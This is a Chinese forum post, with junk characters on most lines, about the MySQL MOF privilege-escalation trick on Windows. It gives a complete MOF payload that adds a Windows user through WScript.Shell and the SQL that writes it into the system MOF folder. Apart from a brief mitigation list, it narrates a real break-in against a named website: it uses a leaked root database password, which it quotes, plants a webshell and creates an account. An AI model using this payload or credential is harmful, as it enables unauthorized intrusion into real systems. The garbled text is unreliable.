Mysql mof扩展漏洞防范方法4 o5 A3 T$ S% V) K0 G6 |
+ k0 X, Y2 a# H1 Q9 l' @7 [
网上公开的一些利用代码:$ B. n4 I n: U6 Z2 [
( y+ U5 i& l a+ }( d* F; ^#pragma namespace(“\\\\.\\root\\subscription”)
- }7 n4 H( o, V, Q
! L! t4 x% b, k5 Ainstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };5 i2 a g2 R2 Y1 g0 ]
. h: p* m/ O0 b3 ?/ S 9 `2 X k' O% [+ B
Y! g) [" H: }& M
+ B& y9 G- S7 }3 n; J m* v) j% s L* {6 U7 t b" v, h$ _) H
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;* X. S, Z( c4 N% t& P W) X
从上面代码来看得出解决办法:
+ P" P3 S) h3 z: U0 ?9 k
0 t$ `& H4 I( S! e/ S1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
. Y9 ?2 t; \% P8 Q+ L6 v1 s' c# |0 A3 T3 `# K
2、禁止使用”WScript.Shel”组件
, I8 P9 s; j: u* r, W
) f0 @: _/ Y4 o( s' o. b3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER" Q0 d: L+ i" X$ a
' M/ o1 p. y+ A8 t0 E当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下4 G7 w" e# S2 F1 g3 A' r* l
: X' b% L1 D- S事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权/ S* Z0 n( {9 l6 {" m6 Z: I
5 d6 {# H0 b' \. l& ^- {
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
9 M: u& y1 j5 j
4 q5 s* I+ L5 [5 b! L看懂了后就开始练手吧
8 S" Z) t0 X: I6 B P" r& E. N8 J4 b5 \
http://www.webbmw.com/config/config_ucenter.php 一句话 a
9 o. O7 c/ P& D& @. K' C, F* _- |
' y7 J1 K! k; ~# s5 Y$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。9 _9 I: M( C( b. U( y0 P0 x% _+ t
2 S: b; Y" @% A+ M. |于是直接用菜刀开搞
- P$ E# e7 y( K: v- `: c# ^9 A
/ X+ h+ h+ B I/ H% C; P: ]% s上马先9 _9 [2 N* D* }% J# Q1 e3 U" X
' M5 I! P6 {& x5 J7 n, O9 d
既然有了那些账号 之类的 于是我们就执行吧…….
/ A: l6 m V# S. H3 T e
: p$ H z3 Q7 E/ e2 d- N/ f) i8 u小小的说下" J0 o% @3 n: Z* O% {" J" q0 @
# I: M1 K. A1 r6 l+ f1 K在这里第1次执行未成功 原因未知
, A0 P. c/ c% t& ]* B, z5 x
5 K9 e) }. u) l. L0 X* N我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' _" f2 e: M6 B* w! F
- G0 A; b, ]1 I#pragma namespace(“\\\\.\\root\\subscription”) ~6 Z1 @: ] [" {
# _% F1 O! L$ Q6 z
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };! T$ [/ O2 C* L3 {1 p
- y; }9 H) ^+ @3 g+ w
我是将文件放到C:\WINDOWS\temp\1.mof
+ c% e, [ r7 ?. H2 v2 E# u$ d! O* C; @0 l+ q
所以我们就改下执行的代码
( `$ U2 j; @( F5 w+ B
0 D& I2 }7 P/ f2 l* a' G t& y; _2 iselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;4 K4 T0 _9 [# J* @
/ T9 x% [% H4 g* H8 Z
. f" s1 o O% m6 t
0 F0 I3 {( \/ ~/ s! E/ K" o2 \但是 你会发现账号还是没有躺在那里。。
" d; Z$ g0 ? g/ X. t5 e! Y0 I# Z( o/ r2 i7 C4 y* J1 ~: d: Q, {
于是我就感觉蛋疼
! E& k& ]0 u" ?& J" _& Q( F$ v A5 l+ n% ~% z' V2 a- @1 h
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
1 S- R0 h1 A" {6 x" ~8 n) g, P. d' }3 {, a1 a( M/ Z
+ W2 l' m; w" S( x5 p
2 M8 r& y4 k6 K0 F但是其他库均不成功…
7 Y/ l; {6 G4 i6 b! n3 o8 r0 b0 M Y
我就很费解呀 到底为什么不成功求大牛解答…
9 S( W- D$ ^9 N Z# s( V$ g& ?0 j: b3 U$ I0 F
7 r& Q8 ^9 ~# |) r
6 Z8 H6 J1 m1 `" C. M |
发表于 2013-1-4 19:49:49
收藏
支持
反对